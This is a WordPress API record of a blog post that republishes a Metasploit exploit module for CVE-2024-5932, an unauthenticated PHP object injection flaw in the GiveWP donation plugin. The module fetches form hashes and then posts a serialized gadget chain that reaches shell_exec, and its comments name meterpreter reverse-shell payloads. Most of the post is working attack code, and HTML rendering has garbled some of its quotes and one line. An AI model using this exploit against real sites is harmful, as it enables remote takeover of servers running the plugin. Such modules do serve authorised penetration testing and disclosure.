{"id":59229,"date":"2024-08-29T19:59:38","date_gmt":"2024-08-29T16:59:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180463\/wp_givewp_rce.rb.txt"},"modified":"2024-08-29T19:59:38","modified_gmt":"2024-08-29T16:59:38","slug":"wordpress-givewp-donation-fundraising-platform-3-14-1-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-givewp-donation-fundraising-platform-3-14-1-code-execution\/","title":{"rendered":"WordPress GiveWP Donation \/ Fundraising Platform 3.14.1 Code Execution"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘GiveWP Unauthenticated Donation Process Exploit’,
‘Description’ => %q{
The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.
},<\/p>\n

‘License’ => MSF_LICENSE,
‘Author’ => [
‘Villu Orav’, # Initial Discovery
‘EQSTSeminar’, # Proof of Concept
‘Julien Ahrens’, # Vulnerability Analysis
‘Valentin Lobstein’ # Metasploit Module
],
‘References’ => [
[‘CVE’, ‘2024-5932’],
[‘URL’, ‘https:\/\/github.com\/EQSTSeminar\/CVE-2024-5932’],
[‘URL’, ‘https:\/\/www.rcesecurity.com\/2024\/08\/wordpress-givewp-pop-to-rce-cve-2024-5932’],
[‘URL’, ‘https:\/\/www.wordfence.com\/blog\/2024\/08\/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin’]],
‘DisclosureDate’ => ‘2024-08-25’,
‘Platform’ => %w[unix linux win],
‘Arch’ => [ARCH_CMD],
‘Privileged’ => false,
‘Targets’ => [
[
‘Unix\/Linux Command Shell’,
{
‘Platform’ => %w[unix linux],
‘Arch’ => ARCH_CMD
# tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp
}
],
[
‘Windows Command Shell’,
{
‘Platform’ => ‘win’,
‘Arch’ => ARCH_CMD
# tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp
}
]],
‘DefaultTarget’ => 0,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [REPEATABLE_SESSION],
‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]}
)
)
end<\/p>\n

def check
return CheckCode::Unknown unless wordpress_and_online?<\/p>\n

print_status(“WordPress Version: #{wordpress_version}”) if wordpress_version
check_code = check_plugin_version_from_readme(‘give’, ‘3.14.2’)
return CheckCode::Safe unless check_code.code == ‘appears’<\/p>\n

print_good(“Detected GiveWP Plugin version: #{check_code.details[:version]}”)
CheckCode::Appears
end<\/p>\n

def exploit
forms = fetch_form_list
fail_with(Failure::UnexpectedReply, ‘No forms found.’) if forms.empty?<\/p>\n

selected_form = forms.sample
valid_form = retrieve_and_analyze_form(selected_form[‘id’])<\/p>\n

return print_error(‘Failed to retrieve a valid form for exploitation.’) unless valid_form<\/p>\n

print_status(“Using Form ID: #{valid_form[‘give_form_id’]} for exploitation.”)
send_exploit_request(
valid_form[‘give_form_id’],
valid_form[‘give_form_hash’],
valid_form[‘give_price_id’],
valid_form[‘give_amount’])
end<\/p>\n

def fetch_form_list
res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘wp-admin’, ‘admin-ajax.php’),
‘data’ => ‘action=give_form_search’
)<\/p>\n

return print_error(‘Failed to retrieve form list.’) unless res&.code == 200<\/p>\n

forms = JSON.parse(res.body)
form_ids = forms.map { |form| form[‘id’] }.sort<\/p>\n

print_good(“Successfully retrieved form list. Available Form IDs: #{form_ids.join(‘, ‘)}”)
forms
end<\/p>\n

def retrieve_and_analyze_form(form_id)
form_res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘wp-admin’, ‘admin-ajax.php’),
‘vars_post’ => { ‘action’ => ‘give_donation_form_nonce’, ‘give_form_id’ => form_id }
)<\/p>\n

return unless form_res&.code == 200<\/p>\n

form_data = JSON.parse(form_res.body)
give_form_id = form_id
give_form_hash = form_data[‘data’]give_price_id = ‘0’
give_amount = ‘$10.00’
# Somehow, can’t randomize give_price_id and give_amount otherwise the exploit won’t work.<\/p>\n

return unless give_form_hash<\/p>\n

{
‘give_form_id’ => give_form_id,
‘give_form_hash’ => give_form_hash,
‘give_price_id’ => give_price_id,
‘give_amount’ => give_amount
}
end<\/p>\n

def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)
final_payload = format(
‘O:19:”Stripe\\\\\\\\\\\\\\\\StripeObject”:1:{s:10:”\\\\0*\\\\0_values”;a:1:{s:3:”foo”;’ \\
‘O:62:”Give\\\\\\\\\\\\\\\\PaymentGateways\\\\\\\\\\\\\\\\DataTransferObjects\\\\\\\\\\\\\\\\GiveInsertPaymentData”:1:{‘ \\
‘s:8:”userInfo”;a:1:{s:7:”address”;O:4:”Give”:1:{s:12:”\\\\0*\\\\0container”;’ \\
‘O:33:”Give\\\\\\\\\\\\\\\\Vendors\\\\\\\\\\\\\\\\Faker\\\\\\\\\\\\\\\\ValidGenerator”:3:{s:12:”\\\\0*\\\\0validator”;’ \\
‘s:10:”shell_exec”;s:12:”\\\\0*\\\\0generator”;’ \\
‘O:34:”Give\\\\\\\\\\\\\\\\Onboarding\\\\\\\\\\\\\\\\SettingsRepository”:1:{‘ \\
‘s:11:”\\\\0*\\\\0settings”;a:1:{s:8:”address1″;s:%<length>d:”%<encoded>s”;}}’ \\
‘s:13:”\\\\0*\\\\0maxRetries”;i:10;}}}}}}’,
length: payload.encoded.length,
encoded: payload.encoded
)<\/p>\n

data = {
‘give-form-id’ => give_form_id,
‘give-form-hash’ => give_form_hash,
‘give-price-id’ => give_price_id,
‘give-amount’ => give_amount,
‘give_first’ => Faker::Name.first_name,
‘give_last’ => Faker::Name.last_name,
‘give_email’ => Faker::Internet.email,
‘give_title’ => final_payload,
‘give-gateway’ => ‘offline’,
‘action’ => ‘give_process_donation’
}<\/p>\n

send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘wp-admin’, ‘admin-ajax.php’),
‘data’ => URI.encode_www_form(data)
}, 0)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HTTP::Wordpressprepend Msf::Exploit::Remote::AutoCheck def initialize(info = {})super(update_info(info,‘Name’ => ‘GiveWP Unauthenticated Donation Process Exploit’,‘Description’ => %q{The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59229","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59229"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59229\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59229"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}